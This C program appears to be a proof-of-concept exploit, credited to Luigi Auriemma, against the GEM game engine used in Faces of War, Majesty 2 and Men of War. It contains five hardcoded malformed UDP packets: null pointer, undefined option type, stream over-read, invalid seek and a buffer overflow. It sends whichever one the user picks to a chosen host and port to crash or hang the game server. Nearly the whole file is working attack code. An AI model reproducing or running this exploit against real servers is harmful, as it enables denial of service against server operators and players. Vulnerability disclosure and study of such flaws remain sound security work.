/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
    #define stristr strcasestr
    #define stricmp strcasecmp
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        3210
#define BUFFSZ      1500



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err);
int udp_sock(void);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



// this PoC is only an automated version of the previous solution which
// was the sending of the packet files manually
// the following are the same packets of the previous solution:
static u8
gembugs1[] =
    "\x09\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x02\x00\x40"
    "\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x31\x01\x0c"
    "null pointer",
gembugs2[] =
    "\x09\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x02\x00\x40"
    "\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x3e\x01\x02\x6a\x05\xff\x15"
    "undefined option type",
gembugs3[] =
    "\x09\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x02\x00\x40"
    "\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x4b\x01\x02\x6a\x05\x03\xff"
    "Attempt to read beyond the stream!",
gembugs4[] =
    "\x09\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x02\x00\x40"
    "\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\x2a\x01\x02\x6a\x05\x03\x16"
    "Invalid seek location!",
gembugs5[] =
    "\x09\x00\x00\xff\xff\x00\x00\x00\x00\xff\xff\xff\xff\x02\x00\x40"
    "\x00\x00\xff\xff\xff\xff\xff\xff\x00\x00\x00\x00\x00\x00\x00\x00"
    "\x00\x00\xff\x01\x02\x6a\x05\x06\xd6"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"
    "aaaaaaaaaaaaaaaaaaaaaa";



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    int     sd,
            i,
            pcklen,
            bug;
    u16     port    = PORT;
    u8      *host,
            *pck;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "GEM engines multiple vulnerabilities "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 3) {
        printf("\n"
            "Usage: %s <bug> <host> [port(%d)]\n"
            "\n"
            "Bugs:\n"
            " 1 = null pointer\n"
            " 2 = undefined option type\n"
            " 3 = Attempt to read beyond the stream! / silently unresponsive\n"
            " 4 = Invalid seek location!\n"
            " 5 = buffer overflow\n"
            "\n", argv[0], port);
        exit(1);
    }

    bug  = atoi(argv[1]);
    host = argv[2];
    if(argc > 3) port = atoi(argv[3]);

    #define BUG_CHOICE(X)   case X: { pck = gembugs##X; pcklen = sizeof(gembugs##X) - 1; } break;
    switch(bug) {
        BUG_CHOICE(1)
        BUG_CHOICE(2)
        BUG_CHOICE(3)
        BUG_CHOICE(4)
        BUG_CHOICE(5)
        default: {
            printf("\nError: invalid bug number (%d)\n", bug);
            exit(1);
        }
    }

    peer.sin_addr.s_addr  = resolv(host);
    peer.sin_port         = htons(port);
    peer.sin_family       = AF_INET;

    printf("- target   %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    sd = udp_sock();

    for(i = 0;; i++) {
        if(!i) {
            printf("- send malformed packet for Faces of War and Majesty 2\n");
            pck[0] = 0x07;
                 if(pck[0x27] == 0x03) pck[0x27] = 0x04;
            else if(pck[0x27] == 0x06) pck[0x27] = 0x01;
        } else if(i == 1) {
            printf("- send malformed packet for Men of War\n");
            pck[0] = 0x09;
                 if(pck[0x27] == 0x04) pck[0x27] = 0x03;
            else if(pck[0x27] == 0x01) pck[0x27] = 0x06;
        } else {
            break;
        }

        send_recv(sd, pck, pcklen, NULL, 0, &peer, 1);
        send_recv(sd, pck, pcklen, NULL, 0, &peer, 1);
    }

    printf("\n- done\n");
    close(sd);
    return(0);
}



int send_recv(int sd, u8 *in, int insz, u8 *out, int outsz, struct sockaddr_in *peer, int err) {
    int     retry,
            len;

    if(in && !out) {
        //fputc('.', stdout);
        if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
          < 0) goto quit;
        return(0);
    }
    if(in) {
        for(retry = 2; retry; retry--) {
            //fputc('.', stdout);
            if(sendto(sd, in, insz, 0, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
              < 0) goto quit;
            if(!timeout(sd, 1)) break;
        }
        if(!retry) goto quit2;
    } else {
        if(timeout(sd, 3) < 0) goto quit2;
    }
    //fputc('.', stdout);
    len = recvfrom(sd, out, outsz, 0, NULL, NULL);
    if(len < 0) goto quit;
    return(len);
quit:
    if(err) std_err();
    return(-1);
quit2:
    if(err) {
        printf("\nError: socket timeout, no reply received\n\n");
        exit(1);
    }
    return(-1);
}



int udp_sock(void) {
    struct  linger  ling = {1,1};
    int     sd;

    sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    return(sd);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


